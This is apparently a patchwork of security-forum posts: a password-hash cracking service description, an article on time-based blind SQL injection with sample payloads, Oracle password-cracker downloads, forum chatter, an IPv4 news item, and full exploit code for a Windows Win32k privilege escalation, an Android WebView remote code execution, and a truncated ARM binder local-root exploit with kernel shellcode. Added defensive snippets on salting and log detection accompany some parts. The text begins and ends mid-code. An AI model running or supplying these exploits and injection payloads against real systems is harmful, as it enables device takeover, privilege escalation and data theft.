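    print("INFO2 version", version)
    for r in records:
        print(r["recycled_name"], r["drive"], r["deleted_at"].isoformat(), r["size"], r["original_path"])
```

Deletion times in INFO2 are UTC, so convert to the examined machine's time zone before correlating with other artefacts, and treat a record whose Unicode path is empty with care: only the 8.3-style ANSI path is then available.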
-
[h=1]Free Password Hash Cracker[/h]

[h=2]How CrackStation Works[/h]

CrackStation uses massive pre-computed lookup tables to crack password hashes. These tables store a mapping between the hash of a password and the correct password for that hash. The hash values are indexed so that it is possible to quickly search the database for a given hash. If the hash is present in the database, the password can be recovered in a fraction of a second. This only works for "unsalted" hashes. For information on password hashing systems that are not vulnerable to pre-computed lookup tables, see our hashing security page.

CrackStation's lookup tables were created by extracting every word from the Wikipedia databases and adding every password list we could find. We also applied intelligent word mangling (brute force hybrid) to our wordlists to make them much more effective. For MD5 and SHA1 hashes, we have a 190GB, 15-billion-entry lookup table, and for other hashes, we have a 19GB 1.5-billion-entry lookup table.

You can download CrackStation's dictionaries here, and the lookup table implementation (PHP and C) is available here.

https://crackstation.net/
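The reason the service above only works for unsalted hashes is worth seeing concretely. The code below is an added example, not CrackStation's implementation: it builds a small lookup table (hexdigest to plaintext) from a constructed wordlist, recovers the plaintext of an unsalted MD5 or SHA1 digest with one dictionary lookup, and then shows that a per-user random salt combined with a slow key derivation (PBKDF2-HMAC-SHA256 from the standard library, chosen here as the standard-library option) yields a different digest every time, so no table built over words can contain it. The iteration count is a parameter of this example.

```python
"""Added example (not CrackStation's code): lookup-table recovery of unsalted hashes
versus salted, iterated hashing. Wordlist and salts are constructed."""
import hashlib
import hmac
import secrets

# Constructed wordlist standing in for the multi-billion-entry tables described above.
WORDLIST = ["password", "letmein", "123456", "dragon", "qwerty", "iloveyou"]


def build_lookup_table(words, algorithm):
    """Precomputation: map hexdigest -> plaintext for every word under one algorithm."""
    return {hashlib.new(algorithm, w.encode()).hexdigest(): w for w in words}


def lookup(table, hexdigest):
    """Reverse an unsalted hash with a single dictionary lookup; None if not present."""
    return table.get(hexdigest.strip().lower())


def new_salt(length=16):
    """A fresh random salt per stored password; it does not need to be secret."""
    return secrets.token_bytes(length)


def salted_hash(password, salt, iterations=200_000):
    """Salt + slow KDF. The salt is stored alongside the digest in one string."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    scheme, iterations, salt_hex, digest_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        raise ValueError("unsupported scheme")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), digest_hex)


if __name__ == "__main__":
    md5_table = build_lookup_table(WORDLIST, "md5")
    print("md5 lookup:", lookup(md5_table, "5f4dcc3b5aa765d61d8327deb882cf99"))
    stored = salted_hash("password", new_salt())
    print("salted record:", stored)
    print("salted digest in table:", lookup(md5_table, stored.split("$")[-1]))
```

The lookup succeeds because every user who chose "password" has the same MD5, so one precomputed entry serves all of them; with a per-user salt the attacker must recompute the slow function for each candidate word and each user separately. Where a dedicated password hash such as bcrypt, scrypt or Argon2 is available it is the better choice, and the iteration count should be raised as hardware improves.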
-
Time-Based Blind SQL Injection with Heavy Queries

Published: September 12, 2007
By Chema Alonso, Microsoft Security MVP

Introduction

This article describes how attackers take advantage of SQL Injection vulnerabilities by using time-based blind SQL injection with heavy queries. Our goal is to highlight the need for establishing secure development best practices for Web applications instead of relying only on the security provided by the perimeter defenses. This article shows exploit examples for Microsoft SQL Server and Microsoft Access database engines, but the present technique is applicable to any other database product in the market.

Time-Based Blind SQL Injection

The first references to “blind attacks” can be found in Chris Anley’s June 2002 paper “(More) Advanced SQL Injection” [1], in which he calls attention to the possibility of creating such attacks -- in this specific case, time-based, one of the less common. Chris gives some examples of blind SQL injection techniques:

[...] if (ascii(substring(@s, @byte, 1)) & ( power(2, @BIT))) > 0 waitfor delay '0:0:5'

... it is possible to determine whether a given bit in a string is '1' or '0'. That is, the above query will pause for five seconds if bit '@BIT' of byte '@byte' in string '@s' is '1'. For example, the following query:

declare @s varchar(8000)
select @s = db_name()
if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5'

will pause for five seconds if the first bit of the first byte of the name of the current database is 1.

As these examples show, the information is extracted from the database using a vulnerable parameter. Code is then injected to generate a delay in response time when the condition is true. After this first reference, blind SQL injection techniques continued to be studied, with most techniques generating error messages from the attacked system, because of the simplicity, quick execution, and extension of showing an error message versus delaying the database.

One year later, in September 2003, Ofer Maor and Amichai Shulman published the paper “Blindfolded SQL Injection” [2]. Here, they analyze different ways to identify a vulnerable parameter on a SQL Injection system, even when the information processed and returned by the system is not visible.

At the 2004 BlackHat Conference, Cameron Hotchkies presented his paper “Blind SQL Injection Automation Techniques” [3]. He proposed alternative methods to automate the exploitation of a Blind SQL Injection vulnerable parameter, using different custom tools. He suggested three different solutions for the automation: (1) searching for keywords on positive and negative results; (2) using MD5 signatures to discriminate positive and negative results; (3) using a textual difference engine. He also introduced SQueal, an automatic tool to extract information through Blind SQL Injection, which evolved later into another tool called Absinthe [4].

In September 2005, David Litchfield published the article “Data Mining with SQL Injection and Inference” [5], where he discussed the time-based inference techniques, and proposed other ways to obtain time delays using calls to stored procedures, such as xp_cmdshell on MS SQL Server to do a ping:

xp_cmdshell 'ping -n 10 127.0.0.1' → application paused 10 seconds.

Time-based techniques can be extended to any action performed by a stored procedure and able to generate a time delay or any other measurable action.

In December 2006, Ronald van den Heetkamp published the “SQL Injection Cheat Sheet” [6], including Blind SQL Injection tricks for MySQL with some examples based on benchmark functions that can generate time delays. For instance:

SELECT BENCHMARK(10000000,ENCODE('abc','123')); [around 5 sec]
SELECT BENCHMARK(1000000,MD5(CHAR(116))) [around 7 sec]

Example:

SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

A recent exploit [7], published in June 2007 at http://www.milw0rm.com (a Web site dedicated to exploits and security), shows how this technique could be used to attack a game server called Solar Empire:

$sql="F***You'),(1,2,3,4,5,(SELECT IF (ASCII (SUBSTRING(se_games.admin_pw, ".$j.", 1)) =".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM se_games))/*";

As the studies of the time-based Blind SQL Injection techniques move forward, some new tools have been created, such as SQL Ninja [8], which uses the Wait-for method for Microsoft SQL Server engines, or SQL PowerInjector [9], which implements the Wait-for method for Microsoft SQL Server Database engines, Benchmark functions for MySQL engines, and an extension of the Wait-for method for Oracle engines, using calls to DBMS_LOCK methods.

Full article: Time-Based Blind SQL Injection with Heavy Queries
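All of the primitives surveyed in the article share two observable traits: the request carries a delay construct (WAITFOR DELAY, BENCHMARK(), DBMS_LOCK calls) and the response takes far longer than the same path normally does. The detection logic below is an added example, not code from the article or from any of the tools it names; it runs over web server access log lines in a constructed format (`client "request line" status response_ms`) with constructed lines, matches the decoded query string against those primitives (plus `sleep(` and `pg_sleep(`, added here for MySQL and PostgreSQL), and separately flags latency outliers per path, which catches the side effect even when the payload itself is obfuscated.

```python
"""Added example (not from the article): flag time-based blind SQLi probes in access
logs by payload signature and by per-path response-time outliers. Log lines are constructed."""
import re
import statistics
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed access log: client, request line, status, response time in milliseconds.
SAMPLE_LOG = """\
10.0.0.7 "GET /index.php?id=1 HTTP/1.1" 200 38
10.0.0.7 "GET /index.php?id=2 HTTP/1.1" 200 41
10.0.0.8 "GET /index.php?id=3 HTTP/1.1" 200 36
10.0.0.9 "GET /index.php?id=1%20WAITFOR%20DELAY%20%270:0:5%27 HTTP/1.1" 200 5044
10.0.0.9 "GET /index.php?id=1%20AND%20BENCHMARK(10000000,MD5(1)) HTTP/1.1" 200 4820
10.0.0.9 "GET /index.php?id=1%20AND%201=1 HTTP/1.1" 200 40
10.0.0.8 "GET /index.php?id=2 HTTP/1.1" 200 3900
"""

LINE_RE = re.compile(r'^(\S+) "(\S+) (\S+) [^"]*" (\d{3}) (\d+)$')
DELAY_RE = re.compile(
    r"waitfor\s+delay|benchmark\s*\(|\bsleep\s*\(|pg_sleep\s*\(|dbms_lock\.sleep",
    re.IGNORECASE,
)


def parse_log(text):
    entries = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue   # unparseable line: skip rather than crash the scan
        client, method, target, status, ms = m.groups()
        entries.append({
            "line": line_no, "client": client, "method": method,
            "target": unquote_plus(target),       # decode before matching
            "path": urlsplit(target).path,
            "status": int(status), "ms": int(ms),
        })
    return entries


def detect(entries, min_ms=1000, ratio=10.0):
    """Flag entries whose decoded request contains a delay primitive, and entries whose
    response time is both above min_ms and more than `ratio` times the median for the
    same path (the side effect a time-based injection produces when the condition holds)."""
    by_path = defaultdict(list)
    for e in entries:
        by_path[e["path"]].append(e["ms"])
    medians = {p: statistics.median(v) for p, v in by_path.items()}
    flagged = []
    for e in entries:
        reasons = []
        if DELAY_RE.search(e["target"]):
            reasons.append("delay-primitive")
        if e["ms"] >= min_ms and e["ms"] > ratio * medians[e["path"]]:
            reasons.append("latency-outlier")
        if reasons:
            flagged.append({"line": e["line"], "client": e["client"], "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in detect(parse_log(SAMPLE_LOG)):
        print(hit)
```

The last constructed line is slow without carrying a payload and is flagged on latency alone; that is the case to review rather than block outright, since a heavy legitimate query produces the same outlier. Probes typically arrive as a series from one client with the delay alternating present and absent, so grouping hits by client and counting them over a window reduces single-request noise.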
-
Oracle Password Checker (Cracker) Checkpwd 1.23 (free)

Checkpwd 1.23 is one of the fastest (see Benchmark) dictionary based password checkers for Oracle databases. This is a useful tool for DBAs to identify Oracle accounts with weak or default passwords. Version 1.23 contains a version which only shows that a password is weak but not the password itself. Checkpwd reads the password hashes from the view dba_users and compares the hashkeys with the hashkeys calculated from a dictionary file. Details about Oracle (database) passwords are available here: Fact Sheet about Oracle database passwords.

Downloads

- Checkpwd 1.23 (for Windows) + default passwords + libraries + wordlist with 1.5 Mio words + Oracle Instant Client 10.2 (35 MB, MD5SUM: d41737cca1b07d66bd134c53989fa1b5 *oracle_checkpwd_big.zip)
- Checkpwd 1.23 (for Windows) + default passwords + libraries (1.5 MB, MD5SUM: 17a00e28b9ff0e6bed45554b43f62b06 *oracle_checkpwd.zip)
- Checkpwd 1.23 - passwords not displayed - (for Windows) + default passwords + libraries (1.5 MB, MD5SUM: 6638b0c82dea7685b6e045c9f7136168 *oracle_checkpwd_nopw.zip)
- Checkpwd 1.23 (for Linux) + default passwords + Instant Client 10.2 (42 MB, MD5SUM: aa05f5e7c8a20ec1094e68143085c3a7 *oracle_checkpwd_linux.tar.gz)
- Checkpwd 1.23 - passwords not displayed - (for Linux) + default passwords + Instant Client 10.2 (42 MB, MD5SUM: b0f356a27f6089275637555fbe70445d *oracle_checkpwd_nopw_linux.tar.gz)
- Checkpwd 1.23 (for Mac OSX (PPC)) + default passwords + wordlist with 1.5 Mio words + Instant Client 10.1 (48 MB, MD5SUM: fe4608bf25915585adea5bf668ec6569 *oracle_checkpwd_mac_big.tar.gz)
- Checkpwd 1.23 (for Mac OSX (PPC)) + default passwords (without Instant Client) (56 KB, MD5SUM: 53bfaf05ba7375a576a55d30f4a44319 *oracle_checkpwd_mac.tar.gz)
- Checkpwd 1.23 - passwords not displayed - (for Mac OSX (PPC)) + default passwords (without Instant Client) (56 KB, MD5SUM: dc4a3c623224055de5a8bac0f076f7a6 *oracle_checkpwd_nopw_mac.tar.gz)
- Checkpwd 1.23 (for Mac OSX (Intel)) + default passwords + wordlist with 1.5 Mio words + Instant Client 10.1 (37 MB, MD5SUM: be18c958cf1a7af27c7825c9c78c3fa6 *oracle_checkpwd_mac_intel_big.zip)
- Checkpwd 1.23 (for Mac OSX (Intel)) + default passwords (without Instant Client) (68 KB, MD5SUM: f7d82902baea9df804e55b757c452aa3 *oracle_checkpwd_mac_intel.zip)
- Checkpwd 1.23 - passwords not displayed - (for Mac OSX (Intel)) + default passwords (without Instant Client) (68 KB, MD5SUM: edac226122e78c7690bef1b0e4780959 *oracle_checkpwd_nopw_mac_intel.zip)

Source: Oracle Password Cracker (Checker)
-
[h=1]Offensive Computer Security Spring 2014[/h]

[h=1]Spring 2014 Lectures & Videos[/h]

This page contains all the lecture slides and YouTube videos for the Spring 2014 semester of this course.

[h=1]Course Lecture Videos / Slides / Reading:[/h]

Below you can find and watch all the course videos, required reading, and lecture slides for each lecture (where applicable). The videos hosted on YouTube are lower quality than the ones available for direct download (see above). On the left you can find a navigation sidebar which will help you find the lectures relevant to each meta-topic.

The rest here: Offensive Computer Security Home Page (CIS 4930 / CIS 5930) Spring 2014
-
Keygening and cracking SmokeFX Keygenme
Nytro replied to giv's topic in Reverse engineering & exploit development
And on Linux, what can we open it with? -
Solution: a custom DNS client in the browser.
-
And how will TheTime receive a notification if only a link is put in place of the name?
-
I understand your general idea, but I want more detail. Let's take it like this: I'm trying to create a topic. I want to call it "Ajutor WiFi". I start typing "Ajuto.." and what should happen, should the titles of the topics containing "Ajuto" appear? After I type it out completely, "Ajutor WiFi", should the topics with that name appear, exactly that name?
-
And how exactly should the search be done? A simple search and, if a topic with exactly the same name exists, give the user a link to it? They should still be able to post a topic with that name, though; we can't require a topic's name to be a "primary key".
-
The Google Web Search API has been officially deprecated as of November 1, 2010. Therefore, we encourage you to move to Custom Search, which provides an alternative solution. Anyway, it can't work like that. If x posts "Programul smecher" and y posts "Programul smecher v5" and z posts "Programul smecher v6", what do you do? It would take artificial intelligence to make it work properly. You'd end up unable to post with the title "Ajutor" and many others.
-
Google will probably block us and ask for a CAPTCHA. Besides, there can be a great many false positives. The idea is fine, but a good version is hard to implement.
-
If that plugin works, it will be "implemented". But I guarantee you I won't be the one writing code for something like this. I'll take a look tomorrow.
-
Whatever happened to the IPv4 address crisis?
By Lee Schlesinger, Network World
February 17, 2014 06:30 AM ET

Network World - In February 2011, the global Internet Assigned Numbers Authority (IANA) allocated the last blocks of IPv4 address space to the five regional Internet registries. At the time, experts warned that within months all available IPv4 addresses in the world would be distributed to ISPs. Soon after that, unless everyone upgraded to IPv6, the world would be facing a crisis that would hamper Internet connectivity for everyone.

That crisis would be exacerbated by the skyrocketing demand for IP addresses due to a variety of factors: the Internet of Things (refrigerators needing their own IP address); wearables (watches and glasses demanding connectivity); BYOD (the explosion of mobile devices allowed to connect to the corporate network); and the increase in smartphone use in developing countries.

So, here we are three years later and the American Registry for Internet Numbers (ARIN) is still doling out IPv4 addresses in the United States and Canada. Whatever happened to the IPv4 address crisis?

The day of reckoning still looms – it’s just been pushed out as the major Internet players have developed ingenious ways to stretch those available numbers. But these conservation efforts can only work for so long.

ARIN currently has “approximately 24 million IPv4 addresses in the available pool for the region,” according to President and CEO John Curran. They’re available to ISPs large and small, but Curran predicts they will all likely be handed out by “sometime in 2014.”

Even then, addresses will still be available to be assigned to the operators' clients for a while longer. And not all operators are likely to experience shortages at the same time. "It's more of a problem for networks that are growing. For networks that are stable, they can reuse addresses" as some customers drop their service and new ones sign up.

Phil Roberts, technology program manager for the Internet Society, adds, "There's some anticipation in using addresses. Network operators get a block and parcel them out – you don't get them right when you need them."

How did we get here?

The problem took no one by surprise. The Internet Engineering Task Force (IETF) foresaw the global growth of network-connected devices 20 years ago, and in response drafted a new version of the Internet Protocol to address the looming shortage. IPv6 uses a 128-bit address space – that is, 2^128 – yielding far more potential addresses than IPv4’s 32-bit scheme, and in fact more addresses than there are grains of sand in the Earth’s crust.

So, why hasn’t everyone just switched over to IPv6? Well, IPv6 is not backward compatible with IPv4, meaning network operators need to run a dual stack IPv4/IPv6 network for years to come. And for IPv6 to work, it needs to be implemented end to end, meaning IPv6 has to be enabled by network hardware vendors, transit providers, access providers, content providers, and endpoint hardware makers. Since there’s no economic incentive to being the first to invest in revamping your protocol support, many hardware and service providers stood on the sidelines and waited for momentum to build.

Full article: https://www.networkworld.com/news/2014/021714-ipv4-278692.html
-
Antiviruses have been scanning archives with the password "infected" for a long time. Gogu has finally woken up too. Also, Kaspersky patented a scanning method that identifies an infected file inside a password-protected archive (only they know how, it's probably not a simple algorithm, but it's still heuristic). I don't think Google is doing anything special here, unless they happen to be working on their own antivirus. For those who don't know, like this guy, there are sites that "collect" malware and allow access to these files for analysis. Like malware.lu. And these files are downloaded as a zip archive with the password "infected", or at least that's how it used to be done. There's also Mila: http://contagiodump.blogspot.ro/ Likewise, if I remember correctly, it used the same password. Meanwhile, the password-setting algorithm has been tweaked a bit and something gets appended at the end.
-
[h=1]Windows TrackPopupMenuEx Win32k NULL Page[/h]

```ruby
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Windows TrackPopupMenuEx Win32k NULL Page',
      'Description'    => %q{
        This module exploits a vulnerability in win32k.sys where under
        specific conditions TrackPopupMenuEx will pass a NULL pointer to
        the MNEndMenuState procedure. This module has been tested successfully
        on Windows 7 SP0 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Seth Gibson',     # vulnerability discovery
        'Dan Zentner',     # vulnerability discovery
        'Matias Soler',    # vulnerability analysis
        'Spencer McIntyre'
      ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' => {
        'EXITFUNC' => 'thread',
      },
      'Targets'        => [
        [ 'Windows 7 SP0/SP1', { } ]
      ],
      'Payload'        => {
        'Space'       => 4096,
        'DisableNops' => true
      },
      'References'     => [
        [ 'CVE', '2013-3881' ],
        [ 'OSVDB', '98212' ],
        [ 'BID', '62830'],
        [ 'MSB', 'MS13-081' ],
        [ 'URL', 'http://endgame.com/news/microsoft-win32k-null-page-vulnerability-technical-analysis.html' ],
        [ 'URL', 'http://immunityproducts.blogspot.com/2013/11/exploiting-cve-2013-3881-win32k-null.html' ]
      ],
      'DisclosureDate' => 'Oct 08 2013',
      'DefaultTarget'  => 0
    }))
  end

  # Decide from the win32k.sys file version whether this build is affected.
  def check
    os = sysinfo["OS"]
    if (os =~ /windows/i) == nil
      return Exploit::CheckCode::Unknown
    end

    file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
    major, minor, build, revision, branch = file_version(file_path)
    vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")

    case build
    when 7600
      return Exploit::CheckCode::Vulnerable
    when 7601
      return Exploit::CheckCode::Vulnerable if revision <= 18126
    when 9200
      return Exploit::CheckCode::Safe
    end

    return Exploit::CheckCode::Unknown
  end

  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

    if check != Exploit::CheckCode::Vulnerable
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
    end

    if sysinfo["Architecture"] =~ /wow64/i
      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
    elsif sysinfo["Architecture"] =~ /x64/
      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
    end

    print_status("Launching notepad to host the exploit...")
    notepad_process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
    begin
      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      # Reader Sandbox won't allow to create a new process:
      # stdapi_sys_process_execute: Operation failed: Access is denied.
      print_status("Operation failed. Trying to elevate the current process...")
      process = client.sys.process.open
    end

    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-3881", "cve-2013-3881.x86.dll")
    library_path = ::File.expand_path(library_path)

    print_status("Injecting exploit into #{process.pid}...")
    exploit_mem, offset = inject_dll_into_process(process, library_path)

    print_status("Exploit injected. Injecting payload into #{process.pid}...")
    payload_mem = inject_into_process(process, payload.encoded)

    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status("Payload injected. Executing exploit...")
    process.thread.create(exploit_mem + offset, payload_mem)

    print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
  end

end
```

Source: Windows TrackPopupMenuEx Win32k NULL Page
-
Android Browser and WebView addJavascriptInterface Code Execution
Nytro posted a topic in Exploituri
[h=1]Android Browser and WebView addJavascriptInterface Code Execution[/h]

```ruby
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({
    :os_flavor  => "Android",
    :arch       => ARCH_ARMLE,
    :javascript => true,
    :rank       => ExcellentRanking,
    :vuln_test  => %Q|
      for (i in top) {
        try {
          top[i].getClass().forName('java.lang.Runtime');
          is_vuln = true; break;
        } catch(e) {}
      }
    |
  })

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Android Browser and WebView addJavascriptInterface Code Execution',
      'Description'    => %q{
        This module exploits a privilege escalation issue in Android < 4.2's WebView component
        that arises when untrusted Javascript code is executed by a WebView that has one or more
        Interfaces added to it. The untrusted Javascript code can call into the Java Reflection
        APIs exposed by the Interface and execute arbitrary commands.

        Some distributions of the Android Browser app have an addJavascriptInterface call tacked
        on, and thus are vulnerable to RCE. The Browser app in the Google APIs 4.1.2 release of
        Android is known to be vulnerable.

        A secondary attack vector involves the WebViews embedded inside a large number of Android
        applications. Ad integrations are perhaps the worst offender here. If you can MITM the
        WebView's HTTP connection, or if you can get a persistent XSS into the page displayed in
        the WebView, then you can inject the html/js served by this module and get a shell.

        Note: Adding a .js to the URL will return plain javascript (no HTML markup).
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'jduck', # original msf module
        'joev'   # static server
      ],
      'References'     => [
        ['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-'+
                'addjavascriptinterface-code-execution-vulnerability/'],
        ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
        ['URL', 'http://50.56.33.56/blog/?p=314'],
        ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-'+
                'addjavascriptinterface-remote-code-execution/']
      ],
      'Platform'       => 'linux',
      'Arch'           => ARCH_ARMLE,
      'DefaultOptions' => { 'PrependFork' => true },
      'Targets'        => [ [ 'Automatic', {} ] ],
      'DisclosureDate' => 'Dec 21 2012',
      'DefaultTarget'  => 0,
      'BrowserRequirements' => {
        :source    => 'script',
        :os_flavor => "Android",
        :arch      => ARCH_ARMLE
      }
    ))
  end

  def on_request_uri(cli, req)
    if req.uri.end_with?('js')
      print_status("Serving javascript")
      send_response(cli, js, 'Content-type' => 'text/javascript')
    else
      super
    end
  end

  def on_request_exploit(cli, req, browser)
    print_status("Serving exploit HTML")
    send_response_html(cli, html)
  end

  def js
    %Q|
      function exec(obj) {
        // ensure that the object contains a native interface
        try {
          obj.getClass().forName('java.lang.Runtime');
        } catch(e) {
          return;
        }

        // get the runtime so we can exec
        var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
        var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}";

        // get the process name, which will give us our data path
        var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
        var ch, path = '/data/data/';
        while ((ch = p.getInputStream().read()) != 0) {
          path += String.fromCharCode(ch);
        }
        path += '/#{Rex::Text.rand_text_alpha(8)}';

        // build the binary, chmod it, and execute it
        m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();
        m.invoke(null, null).exec(['chmod', '700', path]).waitFor();
        m.invoke(null, null).exec([path]);
        return true;
      }

      for (i in top) {
        if (exec(top[i]) === true) break;
      }
    |
  end

  def html
    "<!doctype html><html><body><script>#{js}</script></body></html>"
  end

end
```

Source: http://www.exploit-db.com/exploits/31519/
-
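As an added illustration of the mitigation side of the module above (my own example, not part of the Metasploit module or the original post), this Java snippet puts the exposure pattern the module relies on next to a hardened version: from API 17 (Android 4.2) a WebView only exports methods annotated with @JavascriptInterface, so the inherited getClass() the exploit chains through is no longer reachable, and on older releases the bridge is simply not installed. The class and method names (WebViewBridgeExample, SafeBridge, setupVulnerable, setupHardened) are hypothetical.

```java
import android.annotation.SuppressLint;
import android.os.Build;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;

/* Hypothetical app code (example, not from the page). Before API 17 every public method of a
 * bridge object, including getClass() inherited from Object, is callable from page JavaScript,
 * which is exactly what the module's  obj.getClass().forName('java.lang.Runtime')  relies on. */
public class WebViewBridgeExample {

    /* VULNERABLE pattern: an unannotated object registered on any Android version. The lint
     * suppression exists only so the example compiles cleanly; the warning it silences is the point. */
    @SuppressLint({"SetJavaScriptEnabled", "AddJavascriptInterface"})
    public static void setupVulnerable(WebView view) {
        view.getSettings().setJavaScriptEnabled(true);
        view.addJavascriptInterface(new Object(), "bridge"); // JS: bridge.getClass().forName(...)
    }

    /* Bridge whose exported surface is one annotated method. With targetSdkVersion >= 17 and a
     * device on API 17+, only @JavascriptInterface methods are visible to JS; getClass() is not. */
    public static final class SafeBridge {
        @JavascriptInterface
        public String version() {
            return "1.0";
        }
    }

    /* HARDENED pattern: install the bridge only where the annotation is enforced. On API < 17
     * there is no safe way to expose a bridge to untrusted content, so none is registered and
     * the caller learns that from the return value. */
    @SuppressLint("SetJavaScriptEnabled")
    public static boolean setupHardened(WebView view) {
        view.getSettings().setJavaScriptEnabled(true);
        if (Build.VERSION.SDK_INT < Build.VERSION_CODES.JELLY_BEAN_MR1) {
            return false; // annotation not enforced here: bridge deliberately not installed
        }
        view.addJavascriptInterface(new SafeBridge(), "bridge");
        return true;
    }
}
```

The annotation check is only enforced when the app's targetSdkVersion is 17 or higher as well, so the manifest setting matters as much as the runtime check.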
[h=1]Linux ARM - Local Root Exploit[/h]

```c
/*
 * Just a lame binder local root exploit stub. Somewhat messy but whatever. The bug was reported in CVE-2013-6282.
 *
 * Tested on Android 4.2.2 and 4.4. Kernels 3.0.57, 3.4.5 and few more. All up to 3.4.5 unpatched should be vulnerable.
 * You need to customize the addresses so that they match the target board. On Android, both /proc/kallsyms and dmesg are
 * restricted, thus no automation here.
 *
 * Rigged up by Piotr Szerman. © 2013
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/ioctl.h>  /* added: declares ioctl(), which the original include list left out */
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>

/* Binder transaction request format */
struct binder_write_read {
  signed long write_size;     /* bytes to write */
  signed long write_consumed; /* bytes consumed by driver */
  unsigned long write_buffer;
  signed long read_size;      /* bytes to read */
  signed long read_consumed;  /* bytes consumed by driver */
  unsigned long read_buffer;
} bwr;

#define BR_NOOP  0x0000720c /* binder memory write value */
#define SC_TABLE 0xc000ee28 /* system call table address */

/* we need to know the lower halfword of the original address of sys_ni_syscall to tailor MMAP_AREA and MMAP_OFF accordingly.
 * you can aid yourself with a NOP block. the higher halfword will in any case become 0x720c. on one of my boxes, the other
 * halfword was 0xdac4. MMAP_AREA must be aligned appropriately. you can extract all the data in question at runtime from
 * /proc/kallsyms and dmesg (not that hard to set off infoleaks with this bug) as long as there are no constraints in place */
#define MMAP_AREA 0x720cd000 /* userspace landing point page-aligned address. */
#define MMAP_OFF  0xac4      /* offset within it to plant the payload */
#define NUM_PAGES 16
#define PAGE_SIZE 4096
#define NOP       0xe1a00000 /* mov r0, r0 */
#define SHELL     "/system/bin/sh"
#define TARGET_APERTURE 68   /* aiming for two adjacent non-implemented syscalls. check arch/arm/kernel/calls.S */
#define BINDER_WRITE_READ 0xc0186201 /* printk your BINDER_WRITE_READ */

/* the target payload */
void __attribute__((regparm(3))) shellcode(void)
{
  asm volatile(
    "__transgressor:;"
    "push {r0-r12,lr}" "\n\t"
    "mov r1, sp" "\n\t"
    /* calculate the process descriptor location */
    "bic r2, r1, #8128" "\n\t"
    "bic r2, r2, #63" "\n\t"
    "ldr r3, [r2, #12]" "\n\t"
    "movt r0, #0" "\n\t"
    "movw r0, #0" "\n\t"
    "ldr r1, [r3, #492]" "\n\t"
    /* cred's location may differ depending on the kernel config.
     * just build and objdump a kernel module with printk(current->cred->uid)
     * to find out. or pinpoint it with the help of kgdb or whatever */
    "mov r4, #8" "\n\t"
    "__loop_cred:;"
    "sub r4, r4, #1" "\n\t"
    "str r0, [r1, #4]!" "\n\t"
    "teq r4, #0" "\n\t"
    "bne __loop_cred" "\n\t"
    "ldr r1, [r3, #488]" "\n\t" /* real_cred. overkill? */
    "mov r4, #8" "\n\t"
    "__loop_real_cred:;"
    "sub r4, r4, #1" "\n\t"
    "str r0, [r1, #4]!" "\n\t"
    "teq r4, #0" "\n\t"
    "bne __loop_real_cred" "\n\t"
    "ldm sp!, {r0-r12,pc}" "\n\t" /* return to ret_fast_syscall */
    "mov pc, lr" "\n\t"
  );
}

int main(int ac, char **av)
{
  char * const shell[] = { SHELL, NULL };
  char *map;
  int fd;

  fprintf(stderr, "[!] binder local root exploit\n[!] © piotr szerman\n");

  fd = open("/dev/binder", O_RDWR);
  if(fd < 0) {
